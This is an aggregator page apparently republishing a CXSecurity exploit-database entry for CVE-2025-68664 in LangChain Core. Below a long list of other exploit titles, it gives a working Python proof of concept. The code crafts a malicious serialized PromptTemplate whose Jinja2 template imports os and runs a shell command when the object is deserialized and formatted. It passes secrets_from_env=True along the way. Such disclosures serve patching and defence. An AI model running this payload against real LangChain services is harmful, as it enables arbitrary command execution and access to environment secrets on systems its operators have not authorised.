惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
WordPress大学
WordPress大学
N
Netflix TechBlog - Medium
宝玉的分享
宝玉的分享
V
Visual Studio Blog
S
Securelist
P
Palo Alto Networks Blog
A
Arctic Wolf
T
Tor Project blog
P
Proofpoint News Feed
I
InfoQ
博客园 - 三生石上(FineUI控件)
T
Threat Research - Cisco Blogs
G
GRAHAM CLULEY
M
MIT News - Artificial intelligence
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Microsoft Security Blog
Microsoft Security Blog
MongoDB | Blog
MongoDB | Blog
C
CXSECURITY Database RSS Feed - CXSecurity.com
Apple Machine Learning Research
Apple Machine Learning Research
S
Secure Thoughts
Cyberwarzone
Cyberwarzone
Blog — PlanetScale
Blog — PlanetScale
Simon Willison's Weblog
Simon Willison's Weblog
博客园 - 【当耐特】
大猫的无限游戏
大猫的无限游戏
腾讯CDC
Latest news
Latest news
Project Zero
Project Zero
V
Vulnerabilities – Threatpost
Y
Y Combinator Blog
S
SegmentFault 最新的问题
Schneier on Security
Schneier on Security
C
CERT Recently Published Vulnerability Notes
W
WeLiveSecurity
罗磊的独立博客
Stack Overflow Blog
Stack Overflow Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
L
LINUX DO - 热门话题
N
News and Events Feed by Topic
PCI Perspectives
PCI Perspectives
C
Cisco Blogs
Application and Cybersecurity Blog
Application and Cybersecurity Blog
爱范儿
爱范儿
T
The Exploit Database - CXSecurity.com
The Last Watchdog
The Last Watchdog
人人都是产品经理
人人都是产品经理
GbyAI
GbyAI
Know Your Adversary
Know Your Adversary
U
Unit 42

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
LangChain Core - Serialization Injection to Jinja2 SSTI/RCE
2026-01-26 · via The Exploit Database - CXSecurity.com

LangChain Core - Serialization Injection to Jinja2 SSTI/RCE

# Exploit Title: LangChain Core - Serialization Injection to Jinja2 SSTI/RCE # Date: 2025-12-29 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Contact: @banyamer_security (Instagram) # GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.langchain.com/ # Software Link: https://pypi.org/project/langchain-core/ # Version: < 0.3.81 and < 1.2.5 # Tested on: Python 3.10 - 3.12 # CVE : CVE-2025-68664 # Description: Exploits unsafe deserialization in langchain_core.load to instantiate a malicious PromptTemplate # with Jinja2 format, leading to Server-Side Template Injection and arbitrary command execution. import os from langchain_core.load import dumps, load from langchain_core.prompts import PromptTemplate # Set a dummy env var (demonstrates potential secret access if needed) os.environ["TEST_SECRET"] = "secret_value_123" # Malicious constructor payload targeting PromptTemplate with SSTI payload = { "exploit": { "lc": 1, "type": "constructor", "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"], "kwargs": { "input_variables": [], "template": "{{ config.get('callbacks', {}).get('__builtins__', {}).get('__import__', lambda x: __import__(x))('os').system('id') }}", "template_format": "jinja2" } } } # Serialize (dumps does not escape 'lc' key) serialized = dumps(payload) # Deserialize - instantiates the malicious PromptTemplate deserialized = load(serialized, secrets_from_env=True) # Extract and invoke the malicious prompt → triggers SSTI → RCE malicious = deserialized["exploit"] output = malicious.format() print("[*] Command execution output:") print(output)



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2026, cxsecurity.com

Back to Top